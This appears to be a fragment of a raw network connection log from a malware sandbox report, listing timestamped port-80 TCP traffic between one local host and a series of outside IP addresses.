                                                    Sep 26, 2024 09:24:44.889312983 CEST4974780192.168.2.4172.96.191.39
                                                    Sep 26, 2024 09:24:45.907017946 CEST4974880192.168.2.4172.96.191.39
                                                    Sep 26, 2024 09:24:45.912059069 CEST8049748172.96.191.39192.168.2.4
                                                    Sep 26, 2024 09:24:45.912137985 CEST4974880192.168.2.4172.96.191.39
                                                    Sep 26, 2024 09:24:45.927192926 CEST4974880192.168.2.4172.96.191.39
                                                    Sep 26, 2024 09:24:45.932145119 CEST8049748172.96.191.39192.168.2.4
                                                    Sep 26, 2024 09:24:45.932163000 CEST8049748172.96.191.39192.168.2.4
                                                    Sep 26, 2024 09:24:45.932180882 CEST8049748172.96.191.39192.168.2.4
                                                    Sep 26, 2024 09:24:45.932189941 CEST8049748172.96.191.39192.168.2.4
                                                    Sep 26, 2024 09:24:45.932199955 CEST8049748172.96.191.39192.168.2.4
                                                    Sep 26, 2024 09:24:45.932271957 CEST8049748172.96.191.39192.168.2.4
                                                    Sep 26, 2024 09:24:45.932281971 CEST8049748172.96.191.39192.168.2.4
                                                    Sep 26, 2024 09:24:45.932317972 CEST8049748172.96.191.39192.168.2.4
                                                    Sep 26, 2024 09:24:45.932327986 CEST8049748172.96.191.39192.168.2.4
                                                    Sep 26, 2024 09:24:46.851675987 CEST8049748172.96.191.39192.168.2.4
                                                    Sep 26, 2024 09:24:46.851741076 CEST8049748172.96.191.39192.168.2.4
                                                    Sep 26, 2024 09:24:46.853308916 CEST4974880192.168.2.4172.96.191.39
                                                    Sep 26, 2024 09:24:47.434020042 CEST4974880192.168.2.4172.96.191.39
                                                    Sep 26, 2024 09:24:48.453090906 CEST4974980192.168.2.4172.96.191.39
                                                    Sep 26, 2024 09:24:48.457947016 CEST8049749172.96.191.39192.168.2.4
                                                    Sep 26, 2024 09:24:48.461374044 CEST4974980192.168.2.4172.96.191.39
                                                    Sep 26, 2024 09:24:48.468880892 CEST4974980192.168.2.4172.96.191.39
                                                    Sep 26, 2024 09:24:48.473792076 CEST8049749172.96.191.39192.168.2.4
                                                    Sep 26, 2024 09:24:49.378112078 CEST8049749172.96.191.39192.168.2.4
                                                    Sep 26, 2024 09:24:49.378387928 CEST8049749172.96.191.39192.168.2.4
                                                    Sep 26, 2024 09:24:49.378437996 CEST4974980192.168.2.4172.96.191.39
                                                    Sep 26, 2024 09:24:49.381532907 CEST4974980192.168.2.4172.96.191.39
                                                    Sep 26, 2024 09:24:49.387654066 CEST8049749172.96.191.39192.168.2.4
                                                    Sep 26, 2024 09:24:59.464101076 CEST4975080192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:24:59.469069004 CEST8049750217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:24:59.469175100 CEST4975080192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:24:59.492176056 CEST4975080192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:24:59.497061968 CEST8049750217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:00.076214075 CEST8049750217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:00.076280117 CEST8049750217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:00.076320887 CEST4975080192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:00.996567011 CEST4975080192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:02.023509979 CEST4975180192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:02.028409958 CEST8049751217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:02.028508902 CEST4975180192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:02.041214943 CEST4975180192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:02.046051979 CEST8049751217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:02.640258074 CEST8049751217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:02.640279055 CEST8049751217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:02.640352011 CEST4975180192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:03.543514967 CEST4975180192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:04.565210104 CEST4975280192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:04.570391893 CEST8049752217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:04.570494890 CEST4975280192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:04.581918001 CEST4975280192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:04.586836100 CEST8049752217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:04.586853981 CEST8049752217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:04.586885929 CEST8049752217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:04.586894989 CEST8049752217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:04.586905003 CEST8049752217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:04.586914062 CEST8049752217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:04.587188005 CEST8049752217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:04.587207079 CEST8049752217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:04.587228060 CEST8049752217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:05.171155930 CEST8049752217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:05.171176910 CEST8049752217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:05.171227932 CEST4975280192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:06.090332031 CEST4975280192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:07.110300064 CEST4975380192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:07.115422010 CEST8049753217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:07.115539074 CEST4975380192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:07.126127958 CEST4975380192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:07.131171942 CEST8049753217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:07.759850979 CEST8049753217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:07.759877920 CEST8049753217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:07.759890079 CEST8049753217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:07.759988070 CEST4975380192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:07.763413906 CEST4975380192.168.2.4217.70.184.50
                                                    Sep 26, 2024 09:25:07.768379927 CEST8049753217.70.184.50192.168.2.4
                                                    Sep 26, 2024 09:25:13.312974930 CEST4975480192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:13.317832947 CEST804975463.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:13.317895889 CEST4975480192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:13.335305929 CEST4975480192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:13.340269089 CEST804975463.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:13.975920916 CEST804975463.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:13.975945950 CEST804975463.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:13.976010084 CEST4975480192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:14.840323925 CEST4975480192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:15.860204935 CEST4975580192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:15.865226030 CEST804975563.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:15.865312099 CEST4975580192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:15.876813889 CEST4975580192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:15.881670952 CEST804975563.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:16.517745018 CEST804975563.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:16.518083096 CEST804975563.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:16.518558979 CEST4975580192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:17.387260914 CEST4975580192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:18.407304049 CEST4975680192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:18.412254095 CEST804975663.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:18.415419102 CEST4975680192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:18.427360058 CEST4975680192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:18.433301926 CEST804975663.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:18.433365107 CEST804975663.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:18.433393955 CEST804975663.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:18.433424950 CEST804975663.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:18.433451891 CEST804975663.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:18.434474945 CEST804975663.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:18.434503078 CEST804975663.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:18.434546947 CEST804975663.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:18.434573889 CEST804975663.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:19.074285984 CEST804975663.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:19.074382067 CEST804975663.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:19.075531006 CEST4975680192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:19.934156895 CEST4975680192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:20.955429077 CEST4975780192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:20.960378885 CEST804975763.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:20.960766077 CEST4975780192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:20.968595982 CEST4975780192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:20.973444939 CEST804975763.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:21.625936031 CEST804975763.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:21.626044989 CEST804975763.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:21.626142979 CEST4975780192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:21.629627943 CEST4975780192.168.2.463.250.47.40
                                                    Sep 26, 2024 09:25:21.634533882 CEST804975763.250.47.40192.168.2.4
                                                    Sep 26, 2024 09:25:26.669290066 CEST4975880192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:26.674209118 CEST804975891.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:26.674427986 CEST4975880192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:26.689239979 CEST4975880192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:26.694668055 CEST804975891.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:28.201219082 CEST4975880192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:28.538357973 CEST804975891.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:28.538377047 CEST804975891.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:28.538388014 CEST804975891.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:28.538450003 CEST4975880192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:28.538450003 CEST4975880192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:28.538525105 CEST4975880192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:28.538990021 CEST804975891.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:28.539079905 CEST4975880192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:28.539381981 CEST804975891.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:28.539501905 CEST4975880192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:28.540839911 CEST804975891.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:28.541014910 CEST4975880192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:29.219043016 CEST4975980192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:29.224152088 CEST804975991.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:29.224255085 CEST4975980192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:29.238564014 CEST4975980192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:29.243537903 CEST804975991.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:29.847120047 CEST804975991.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:29.847426891 CEST804975991.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:29.847471952 CEST4975980192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:30.746700048 CEST4975980192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:31.779706955 CEST4976080192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:31.784846067 CEST804976091.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:31.784920931 CEST4976080192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:31.802073956 CEST4976080192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:31.806988001 CEST804976091.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:31.807014942 CEST804976091.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:31.807053089 CEST804976091.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:31.807061911 CEST804976091.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:31.807070017 CEST804976091.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:31.807173014 CEST804976091.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:31.807182074 CEST804976091.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:31.807214022 CEST804976091.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:31.807223082 CEST804976091.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:32.503022909 CEST804976091.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:32.503079891 CEST804976091.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:32.503709078 CEST4976080192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:33.309079885 CEST4976080192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:34.328795910 CEST4976180192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:34.333697081 CEST804976191.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:34.333899975 CEST4976180192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:34.343224049 CEST4976180192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:34.348031998 CEST804976191.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:34.954703093 CEST804976191.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:34.954732895 CEST804976191.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:34.954936981 CEST4976180192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:34.968432903 CEST4976180192.168.2.491.184.0.200
                                                    Sep 26, 2024 09:25:34.973315001 CEST804976191.184.0.200192.168.2.4
                                                    Sep 26, 2024 09:25:40.005772114 CEST4976280192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:40.010773897 CEST804976213.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:40.010855913 CEST4976280192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:40.024842978 CEST4976280192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:40.029813051 CEST804976213.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:40.469878912 CEST804976213.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:40.470004082 CEST4976280192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:41.527853966 CEST4976280192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:41.532964945 CEST804976213.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:42.546902895 CEST4976380192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:42.552232981 CEST804976313.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:42.553505898 CEST4976380192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:42.565227985 CEST4976380192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:42.570101976 CEST804976313.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:43.015055895 CEST804976313.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:43.017322063 CEST4976380192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:44.079663038 CEST4976380192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:44.084660053 CEST804976313.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:45.093739033 CEST4976480192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:45.098759890 CEST804976413.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:45.098912954 CEST4976480192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:45.111304998 CEST4976480192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:45.116568089 CEST804976413.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:45.116590023 CEST804976413.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:45.116602898 CEST804976413.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:45.116615057 CEST804976413.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:45.116638899 CEST804976413.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:45.116652012 CEST804976413.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:45.116662979 CEST804976413.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:45.116673946 CEST804976413.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:45.116684914 CEST804976413.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:45.577481985 CEST804976413.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:45.577549934 CEST4976480192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:46.622828960 CEST4976480192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:46.935239077 CEST4976480192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:47.072933912 CEST804976413.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:47.072952986 CEST804976413.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:47.073081017 CEST4976480192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:47.640969038 CEST4976580192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:47.646002054 CEST804976513.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:47.646080017 CEST4976580192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:47.655144930 CEST4976580192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:47.660164118 CEST804976513.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:48.123720884 CEST804976513.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:48.123748064 CEST804976513.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:25:48.123872042 CEST4976580192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:48.127863884 CEST4976580192.168.2.413.248.169.48
                                                    Sep 26, 2024 09:25:48.132750988 CEST804976513.248.169.48192.168.2.4
                                                    Sep 26, 2024 09:26:07.284681082 CEST4977080192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:07.289506912 CEST804977043.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:07.289583921 CEST4977080192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:07.303767920 CEST4977080192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:07.308657885 CEST804977043.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:08.214174032 CEST804977043.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:08.214202881 CEST804977043.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:08.214267969 CEST4977080192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:08.811434984 CEST4977080192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:09.828202963 CEST4977180192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:09.833204985 CEST804977143.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:09.833277941 CEST4977180192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:09.845237017 CEST4977180192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:09.850131989 CEST804977143.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:10.737025023 CEST804977143.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:10.737200975 CEST804977143.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:10.737327099 CEST4977180192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:11.356021881 CEST4977180192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:12.374984026 CEST4977280192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:12.380039930 CEST804977243.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:12.380134106 CEST4977280192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:12.392280102 CEST4977280192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:12.397192955 CEST804977243.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:12.397207022 CEST804977243.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:12.397227049 CEST804977243.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:12.397236109 CEST804977243.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:12.397244930 CEST804977243.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:12.397317886 CEST804977243.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:12.397327900 CEST804977243.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:12.397411108 CEST804977243.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:12.397419930 CEST804977243.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:13.288069010 CEST804977243.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:13.288141966 CEST804977243.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:13.288202047 CEST4977280192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:13.902865887 CEST4977280192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:14.922246933 CEST4977380192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:14.927179098 CEST804977343.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:14.927259922 CEST4977380192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:14.937247992 CEST4977380192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:14.942075968 CEST804977343.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:16.665250063 CEST804977343.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:16.665292025 CEST804977343.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:16.665302038 CEST804977343.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:16.665501118 CEST4977380192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:16.665829897 CEST804977343.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:16.665920019 CEST4977380192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:16.666527033 CEST804977343.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:16.666606903 CEST4977380192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:16.668308020 CEST4977380192.168.2.443.242.202.169
                                                    Sep 26, 2024 09:26:16.673217058 CEST804977343.242.202.169192.168.2.4
                                                    Sep 26, 2024 09:26:22.608222961 CEST4977480192.168.2.4103.224.182.242
                                                    Sep 26, 2024 09:26:22.613029957 CEST8049774103.224.182.242192.168.2.4
                                                    Sep 26, 2024 09:26:22.613122940 CEST4977480192.168.2.4103.224.182.242
                                                    Sep 26, 2024 09:26:22.624286890 CEST4977480192.168.2.4103.224.182.242
                                                    Sep 26, 2024 09:26:22.629053116 CEST8049774103.224.182.242192.168.2.4
                                                    Sep 26, 2024 09:26:23.209619999 CEST8049774103.224.182.242192.168.2.4
                                                    Sep 26, 2024 09:26:23.209642887 CEST8049774103.224.182.242192.168.2.4
                                                    Sep 26, 2024 09:26:23.209876060 CEST4977480192.168.2.4103.224.182.242
                                                    Sep 26, 2024 09:26:24.137574911 CEST4977480192.168.2.4103.224.182.242
                                                    Sep 26, 2024 09:26:25.157442093 CEST4977580192.168.2.4103.224.182.242
                                                    Sep 26, 2024 09:26:25.162422895 CEST8049775103.224.182.242192.168.2.4
                                                    Sep 26, 2024 09:26:25.162602901 CEST4977580192.168.2.4103.224.182.242
                                                    Sep 26, 2024 09:26:25.173876047 CEST4977580192.168.2.4103.224.182.242
                                                    Sep 26, 2024 09:26:25.178689957 CEST8049775103.224.182.242192.168.2.4
                                                    Sep 26, 2024 09:26:25.747320890 CEST8049775103.224.182.242192.168.2.4
                                                    Sep 26, 2024 09:26:25.747348070 CEST8049775103.224.182.242192.168.2.4
                                                    Sep 26, 2024 09:26:25.747416019 CEST4977580192.168.2.4103.224.182.242
                                                    Sep 26, 2024 09:26:26.684344053 CEST4977580192.168.2.4103.224.182.242
                                                    Sep 26, 2024 09:26:27.710458994 CEST4977680192.168.2.4103.224.182.242
                                                    Sep 26, 2024 09:26:27.715607882 CEST8049776103.224.182.242192.168.2.4
                                                    Sep 26, 2024 09:26:27.715693951 CEST4977680192.168.2.4103.224.182.242
                                                    Sep 26, 2024 09:26:27.727941990 CEST4977680192.168.2.4103.224.182.242
                                                    Sep 26, 2024 09:26:27.732902050 CEST8049776103.224.182.242192.168.2.4
                                                    Sep 26, 2024 09:26:27.732976913 CEST8049776103.224.182.242192.168.2.4
                                                    Sep 26, 2024 09:26:27.733006001 CEST8049776103.224.182.242192.168.2.4
                                                    Sep 26, 2024 09:26:27.733081102 CEST8049776103.224.182.242192.168.2.4
                                                    Sep 26, 2024 09:26:27.733108997 CEST8049776103.224.182.242192.168.2.4
                                                    Sep 26, 2024 09:26:27.733134985 CEST8049776103.224.182.242192.168.2.4
                                                    Sep 26, 2024 09:26:27.733161926 CEST8049776103.224.182.242192.168.2.4
                                                    Sep 26, 2024 09:26:27.733210087 CEST8049776103.224.182.242192.168.2.4
                                                    Sep 26, 2024 09:26:27.733237982 CEST8049776103.224.182.242192.168.2.4
                                                    Sep 26, 2024 09:26:28.315099001 CEST8049776103.224.182.242192.168.2.4
                                                    Sep 26, 2024 09:26:28.315220118 CEST8049776103.224.182.242192.168.2.4
                                                    Sep 26, 2024 09:26:28.315371990 CEST4977680192.168.2.4103.224.182.242
                                                    Sep 26, 2024 09:26:29.231030941 CEST4977680192.168.2.4103.224.182.242
                                                    Sep 26, 2024 09:26:30.251709938 CEST4977780192.168.2.4103.224.182.242
                                                    Sep 26, 2024 09:26:30.256679058 CEST8049777103.224.182.242192.168.2.4
                                                    Sep 26, 2024 09:26:30.256761074 CEST4977780192.168.2.4103.224.182.242
                                                    Sep 26, 2024 09:26:30.266987085 CEST4977780192.168.2.4103.224.182.242
                                                    Sep 26, 2024 09:26:30.272685051 CEST8049777103.224.182.242192.168.2.4
                                                    Sep 26, 2024 09:26:30.854708910 CEST8049777103.224.182.242192.168.2.4
                                                    Sep 26, 2024 09:26:30.854734898 CEST8049777103.224.182.242192.168.2.4
                                                    Sep 26, 2024 09:26:30.854752064 CEST8049777103.224.182.242192.168.2.4
                                                    Sep 26, 2024 09:26:30.855122089 CEST4977780192.168.2.4103.224.182.242
                                                    Sep 26, 2024 09:26:30.861279964 CEST4977780192.168.2.4103.224.182.242
                                                    Sep 26, 2024 09:26:30.866226912 CEST8049777103.224.182.242192.168.2.4
                                                    Sep 26, 2024 09:26:35.981251955 CEST4977880192.168.2.485.159.66.93
                                                    Sep 26, 2024 09:26:35.988199949 CEST804977885.159.66.93192.168.2.4
                                                    Sep 26, 2024 09:26:35.988399029 CEST4977880192.168.2.485.159.66.93
                                                    Sep 26, 2024 09:26:35.999768972 CEST4977880192.168.2.485.159.66.93
                                                    Sep 26, 2024 09:26:36.006895065 CEST804977885.159.66.93192.168.2.4
                                                    Sep 26, 2024 09:26:37.512382030 CEST4977880192.168.2.485.159.66.93
                                                    Sep 26, 2024 09:26:37.517491102 CEST804977885.159.66.93192.168.2.4
                                                    Sep 26, 2024 09:26:37.517616034 CEST4977880192.168.2.485.159.66.93
                                                    Sep 26, 2024 09:26:38.531837940 CEST4977980192.168.2.485.159.66.93
                                                    Sep 26, 2024 09:26:38.536905050 CEST804977985.159.66.93192.168.2.4
                                                    Sep 26, 2024 09:26:38.537235975 CEST4977980192.168.2.485.159.66.93
                                                    Sep 26, 2024 09:26:38.548629045 CEST4977980192.168.2.485.159.66.93
                                                    Sep 26, 2024 09:26:38.553447008 CEST804977985.159.66.93192.168.2.4
                                                    Sep 26, 2024 09:26:40.061280966 CEST4977980192.168.2.485.159.66.93
                                                    Sep 26, 2024 09:26:40.067174911 CEST804977985.159.66.93192.168.2.4
                                                    Sep 26, 2024 09:26:40.067377090 CEST4977980192.168.2.485.159.66.93
                                                    Sep 26, 2024 09:26:41.078783035 CEST4978080192.168.2.485.159.66.93
                                                    Sep 26, 2024 09:26:41.084065914 CEST804978085.159.66.93192.168.2.4
                                                    Sep 26, 2024 09:26:41.084135056 CEST4978080192.168.2.485.159.66.93
                                                    Sep 26, 2024 09:26:41.102494955 CEST4978080192.168.2.485.159.66.93
                                                    Sep 26, 2024 09:26:41.107435942 CEST804978085.159.66.93192.168.2.4
